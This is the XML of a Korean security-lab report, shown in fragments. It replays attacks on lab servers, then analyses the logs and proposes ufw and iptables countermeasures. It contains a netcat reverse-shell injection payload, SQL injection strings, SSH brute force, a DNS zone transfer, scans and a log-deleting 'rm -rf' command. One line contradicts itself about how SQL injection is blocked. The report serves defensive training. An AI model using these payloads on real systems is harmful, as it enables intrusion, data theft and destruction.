          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2917"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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허용된 관리망만 접속 허용</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
              <w:wordWrap w:val="1"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="3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ufw allow from &lt;관리망IP/?&gt; to any port 22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ufw deny 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="730"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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a3d7d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8"/>
              </w:rPr>
              <w:t>iptables 자동 차단 정책</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2973"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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60초 내 5회 이상 접속 시 차단</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
              <w:wordWrap w:val="1"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30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-m recent --seconds 60 --hitcount 5 -j DROP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✔</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve"> 정찰 스캔 &amp; Hydra 둘 다 차단 가능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3) SSH 원격 로그인 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10.4.0.3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# 탈취한 root 계정과 비밀번호로 ssh 우분투서버에 접속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ssh root@10.4.0.3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4"/>
              </w:rPr>
              <w:t>tail -f /var/log/auth.log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234686" cy="2000250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="59" name="그림 %d 5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2.bmp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686" cy="200025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ssh root@10.4.0.3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# 탈취한 root 계정과 비밀번호로 ssh 우분투서버에 접속</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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1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475996"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="60" name="그림 %d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3.bmp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47599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575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해당 로그는 형식상 정상적인 root 계정 로그인 성공 로그이나,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직전 구간에서 동일 IP에 의해 다수의 인증 실패 및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MaxStartups 제한 발생이 확인되었으며,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이후 동일 출발지에서 로그인 성공이 발생하였으므로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이는 정상 접속이 아니라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Brute Force 공격 이후 계정 탈취에 따른 침해 성공 시점으로 판단된다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4) DNS Zone Transfer(AXFR) 시도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172.16.18.28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# dig 활용하여 DNS서버의 ZONE파일 탈취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dig axfr wj.com @172.16.18.28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4"/>
              </w:rPr>
              <w:t>tail -f /var/log/syslog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79568" cy="1678051"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="61" name="그림 %d 6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98.bm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9568" cy="167805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dig axfr wj.com @172.16.18.28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# dig 활용하여 DNS서버의 ZONE파일 탈취</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2025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23" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>70358</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-100457</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5198364" cy="383286"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="62" name="그림 %d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99.bmp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38328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  <w:rPr/>
              <w:t>transfer of 'wj.com/IN': AXFR started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transfer of 'wj.com/IN': AXFR ended: 1 messages, 12 records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3915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본 로그는 10.4.0.3 IP에서 wj.com 도메인에 대해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DNS Zone Transfer(AXFR)가 수행되었으며,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전송 시작 및 정상 종료 로그가 확인되었다.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이는 Secondary DNS 서버 간 동기화를 위한 관리 트래픽이 아님에도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무단으로 존 파일 전체가 외부로 전송된 사례로,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내부 도메인 구조 및 시스템 정보가 노출될 수 있어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사전 정찰(Information Disclosure) 행위로 판단된다.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50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rPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850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2"/>
              </w:rPr>
              <w:t>UFW 로 AXFR 차단 (권장)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr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UDP 53 허용 (일반 DNS 쿼리)</w:t>
            </w:r>
          </w:p>
        </w:tc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ufw allow proto udp from any to any port 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr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TCP 53 기본 차단</w:t>
            </w:r>
          </w:p>
        </w:tc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ufw deny proto tcp from any to any port 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850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✔</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> 이렇게 하면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DNS 조회(udp) = 정상 동작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AXFR / zone transfer(tcp) = 전부 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1275"/>
        </w:trPr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Secondary DNS 만 허용해야 하는 경우</w:t>
            </w:r>
          </w:p>
        </w:tc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6"/>
              </w:rPr>
              <w:t>ufw allow proto tcp from &lt;SECONDARY_DNS_IP&gt; to any port 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="766"/>
        </w:trPr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그리고 나머지는 차단 유지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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ufw deny proto tcp from any to any port 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2102"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850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AXFR 은 승인된 DNS 서버만 가능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일반 사용자는 AXFR 절대 불가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5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856"/>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853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2"/>
              </w:rPr>
              <w:t>iptables 로 AXFR 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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UDP 53 허용 (일반 DNS 질의)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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iptables -A INPUT -p udp --dport 53 -j ACCEPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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TCP 53 기본 차단 (AXFR 포함)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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iptables -A INPUT -p tcp --dport 53 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1275"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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Secondary DNS 동기화 허용 예시</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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iptables -A INPUT -p tcp -s &lt;SECONDARY_DNS_IP&gt; --dport 53 -j ACCEPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="596"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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차단 기본 유지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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iptables -A INPUT -p tcp --dport 53 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1561"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853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AXFR 통째로 차단하는 대신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 “TCP 53 은 필요한 서버만 허용”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이 방식이라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서비스 장애 없음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내부 질의 정상 동작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무단 AXFR 완전히 차단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재현 공격(dig axfr) 100% 실패됨</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2102"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853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DNS Zone Transfer(AXFR)가 TCP 53 포트 기반으로 수행됨에 따라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일반 DNS 질의(UDP 53)는 허용하되,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TCP 53 포트는 승인된 Secondary DNS 서버 IP에 대해서만 허용하고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그 외 모든 접근은 차단하도록 UFW/iptables 정책을 적용하였다.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5) 웹 애플리케이션 정보 수집(whatweb) 시도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172.16.18.28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# whatweb을 사용하여 관리자 페이지 식별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whatweb dvwa.wj.com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tail -f /var/log/apache2/dvwa_access.log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2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127</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5036439" cy="1222756"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="63" name="그림 %d 6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4.bmp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439" cy="122275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whatweb dvwa.wj.com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# whatweb을 사용하여 관리자 페이지 식별</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1289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2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266827"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="64" name="그림 %d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5.bmp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26682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3122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whatweb 명령을 통해 dvwa.wj.com 웹 서비스에 대한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기술 스택 및 애플리케이션 정보 수집(웹 정찰)이 수행되었으며,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해당 요청은 Apache access.log에 기록되었다.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본 행위는 정상적인 서비스 이용 목적이 아닌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서버 구성 정보 수집을 위한 사전 정찰(Enumeration) 행위로 판단된다.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5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573"/>
        <w:gridCol w:w="4951"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391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2"/>
              </w:rPr>
              <w:t>UFW 로 웹 서비스 정찰(whatweb) 차단 (선택 적용)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391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TCP 80 / 443 접근 통제 (내부 전용 서비스일 경우)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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허용된 네트워크에서만 접속 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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ufw allow from &lt;TRUSTED_NET&gt; to any port 80,443</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>ufw deny 80,443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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예시</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="495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ufw allow from 172.16.0.0/16 to any port 80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ufw deny 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1275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 / 효과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2868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정상 사용자 = 허용된 내부망만 접근 가능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외부 사용자 = 웹 스캐닝 / 정찰 불가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whatweb / nikto / gobuster 등 탐색 도구 차단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5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781"/>
        <w:gridCol w:w="5743"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391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2"/>
              </w:rPr>
              <w:t>iptables 로 웹 서비스 정찰(whatweb) 차단 (선택 적용)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391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TCP 80 / 443 접근 통제 (내부망만 허용)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허용된 네트워크에서만 웹 접속 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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허용 대역만 접속 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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/>
              <w:t>iptables -A INPUT -p tcp -s &lt;TRUSTED_NET&gt; --dport 80 -j ACCEPT</w:t>
            </w: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</w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp -s &lt;TRUSTED_NET&gt; --dport 443 -j ACCEPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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2"/>
              </w:rPr>
              <w:t>나머지 외부 접근 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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2"/>
              </w:rPr>
              <w:t>iptables -A INPUT -p tcp --dport 80 -j DROP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
              <w:wordWrap w:val="1"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pP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2"/>
              </w:rPr>
              <w:t>iptables -A INPUT -p tcp --dport 443 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1275"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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예시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내부망 172.16.0.0/16 만 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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iptables -A INPUT -p tcp -s 172.16.0.0/16 --dport 80 -j ACCEPT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iptables -A INPUT -p tcp --dport 80 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1388"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="278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(https 운영 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="57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iptables -A INPUT -p tcp -s 172.16.0.0/16 --dport 443 -j ACCEPT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iptables -A INPUT -p tcp --dport 443 -j DROP</w:t>
            </w:r>
          </w:p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1536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의미 / 효과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정상 사용자 = 허용된 내부망만 접속 가능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외부 사용자 = 웹 정찰 / 스캐닝 불가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whatweb / nikto / gobuster 등 자동화 탐색 도구 차단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✔</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 취약점 사전 정찰 단계에서 차단 가능</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1358"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="852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본 정책은 “내부 전용 웹 서비스 환경”에서 적용을 권장하며,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외부 서비스 운영 시스템에 적용 시 서비스 가용성에 영향이 있을 수 있음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�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>�</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 서버팀이 검토 포인트를 명확히 인지 가능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6) SQL Injection 취약점 공격 시도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172.16.18.28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# Ping Test 페이지에서 취약점 확인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취약서버 접속하여 SQL injection =&gt;  ' OR '1'='1' #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tail -f /var/log/apache2/dvwa_access.log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3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29150" cy="1608201"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="65" name="그림 %d 6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6.bmp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160820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893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취약서버 접속하여 SQL injection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' OR '1'='1' #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2025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3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033526"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="66" name="그림 %d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7.bmp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03352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55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동일 IP(10.4.0.4)에서 짧은 시간 동안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/login.php, /index.php, /security.php 등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특정 기능 페이지를 연속적으로 직접 호출하는 접근 패턴이 확인되었다.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이는 정상적인 사용자 이용 흐름과 상이하며,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웹 애플리케이션의 페이지 구조 및 취약점 존재 여부를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확인하기 위한 사전 정찰(Enumeration) 행위로 판단된다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1517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 xml:space="preserve">ufw나 iptables 같은 네트워크 방화벽(L3/L4)은 IP와 포트를 제어하는 도구이기 때문에, 정상적인 80(HTTP)이나 443(HTTPS) 포트를 통해 들어오는 SQL Injection 공격 페이로드(문자열)를 직접적으로 차단하기에는 한계가 있다. 고로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="c75252"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SQL Injection 공격은 네트워크 보안 정책으로 차단한다.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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7) 서버 장악(</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Command Injection &amp; Reverse Shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>) 시도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172.16.18.28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# Command Injection 취약점을 이용한 Reverse Shell 탈취 시도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; nc [공격자_IP] [포트] -e /bin/sh </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>=&gt; 127.0.0.1; nc 10.4.0.4 4444 -e /bin/sh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tail -f /var/log/apache2/dvwa_access_log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3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78552" cy="944880"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="67" name="그림 %d 6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8.bmp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8552" cy="94488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3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926844"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="68" name="그림 %d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9.bmp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92684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  <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="893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공격서버(Kali)에서 nc -lvnp 4444 사용하여 포트를 열어주고 대기한다</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>-&gt; 취약점 사이트에 Command Injection &amp; Reverse Shell 공격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127.0.0.1; nc 10.4.0.4 4444 -e /bin/sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="950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drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="3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364617"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="69" name="그림 %d 6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a.bmp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36461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55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로그에 찍힌 경로 /vulnerabilities/exec/는 시스템 관리 도구 페이지에 해당하는데 일반 사용자가 접근할 이유가 전혀 없는 경로에서 반복적인 POST가 발생했으니 비정상적인 접근 시나리오, Command Injection과 Reverse Shell 공격으로 판단한다.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660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</w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8) 서비스 거부 공격 (DoS - Denial of Service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="472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30"/>
              </w:rPr>
              <w:t>172.16.18.28</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="547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# 시스템을 마비시켜 정당한 사용자의 접근을 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="811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rm -rf /var/log/apache2/* (예시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="659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tail -f /var/log/kern.log 또는 dmesg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0"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="117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</w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="893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950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2556"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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0eaed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6"/>
              </w:rPr>
              <w:t>TCP: Possible SYN flooding on port 80. Sending cookies. 메시지 확인.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시나리오 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (수정 예정)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>kali씨는 특정 사이트의 고객들의 개인정보를 가져다가 중국에 팔아버리는 방법으로 큰 돈을 벌어보고자 한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>“대형 사이트의 개인정보를 가져와서 큰 돈을 벌어보자!!!”</w:t>
      </w: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1) DNS 정보 수집 (dnsenum)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10.4.0.3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DNS 서버에 쿼리를 날려 도메인 정보를 수집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dnsenum --unump wj.com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tail -f /var/log/syslog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3486"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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4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2161540"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="70" name="그림 %d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b.bmp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216154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576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dnsenum --unump wj.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># 도메인의 하위 도메인 및 서버 IP 대역 식별</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="837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4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-77597</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5198364" cy="441325"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="71" name="그림 %d 7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c.bmp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44132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56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로그 메시지 형태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 xml:space="preserve">query: wj.com IN A </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(특정 주소 하나만 물어봄)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transfer of 'wj.com/IN': AXFR started (전체 리스트를 요청함)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접속 대상</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(Client)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불특정 다수의 사용자 IP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비인가된 특정 IP (여기서는 10.4.0.4)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전송 데이터 양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1개 혹은 소수의 응답 레코드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 xml:space="preserve">해당 도메인의 모든 레코드 </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(12 records)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발생 빈도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설정된 동기화 주기에 1회 발생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 xml:space="preserve">단시간 내에 반복적으로 시도 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네임서버 로그에서 비인가 IP가 특정 도메인의 전체 주소 정보를 요청하는 'AXFR started/ended' 기록과 함께 12개의 레코드가 한 번에 전송된 수치를 보고 dnsenum 공격임을 판단한다.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정책(예시) iptables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dnsenum 공격으로 인해 서버 로그에 AXFR started 기록이 남는다는 것 자체가 이미 패킷이 서버에 도달했다는 뜻이고 네트워크 ACL을 사용하면 이러한 패킷이 서버에 닿기도 전에 하드웨어 단에서 튕겨내므로, 서버의 자원을 보호하고 보안성을 극대화할 수 있기에 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2) 서비스 스캔 (Nmap)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10.4.0.3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스텔스 SYN 스캔을 통해 열린 포트 확인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nmap -sS -sV -p80,443 172.16.18.0/16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tail -f /var/log/apache2/access.log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3486"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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4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2366264"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="72" name="그림 %d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d.bmp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236626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nmap -sS -sV -p80,443 172.16.18.0/16</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># dnsenum으로 확인한 Zone 파일 도메인 정보중 172.16.18.0/16 대역을 스캔하여  Apache2 버전이 낮은 취약한 서버 하나를 선택</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="837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4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058164"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="73" name="그림 %d 7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e.bmp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05816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간격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초 단위로 띄엄띄엄 발생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동일한 초(05:30:40)에 수많은 요청 집중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User-Agent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Chrome, Firefox 등 실제 브라우저 정보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Nmap Scripting Engine 명시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경로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index.php, login.php 등 유효한 경로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/nmaplowercheck..., /sdk 등 무작위 경로</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="256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상태 코드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200 OK 또는 302 Found 위주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대량의 404 Not Found 발생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User-Agent 필드에 'Nmap Scripting Engine'이 명시되어 있고, 동일한 시간에 존재하지 않는 비정상적인 경로로 다수의 요청이 집중된 패턴을 보고 Nmap Scan 공격으로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3) 무차별 대입 공격 (Brute Force)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172.16.18.33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 xml:space="preserve">Mail 서버의 관리자 계정 노출로 인한 로그인 시도 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Burp Suite를 활용한 Brute Force 공격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tail -f /var/log/roundcubemail/errors.log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3486"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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78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rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="837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460627"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="74" name="그림 %d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af.bmp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46062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빈도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사용자가 비밀번호를 잊어 1~2회 실패 후 간격이 생김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약 10초 간격으로 연속 시도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메시지 내용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로그인 성공 기록이 주를 이룸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"IMAP Error: Login failed for wj" 메시지가 반복됨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소스 IP 주소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신뢰할 수 있는 대역의 IP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특정 공격 IP(10.4.0.4)에서 집중적으로 발생</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="256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대상 계정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본인 계정에 대해서만 시도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특정 관리자 의심 계정(wj) 하나를 집중 공격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동일한 소스 IP에서 특정 계정을 대상으로 수십 초 이내에 연속적인 로그인 실패(Login failed) 로그가 기록되는 패턴을 보고 Brute Force 공격으로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4) SQL Injection 취약점 공격 시도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172.16.18.33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회원조회 칸이 SQL Injection에 취약한 것을 확인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‘ or '1'='1'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tail -f /var/log/apache2/access.log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3486"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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2001520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="75" name="그림 %d 7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0.bmp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200152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' or '1'='1'</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># 관리자 전용 메뉴인 ‘회원조회’ 칸이 SQL Injection에 취약한 것을 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
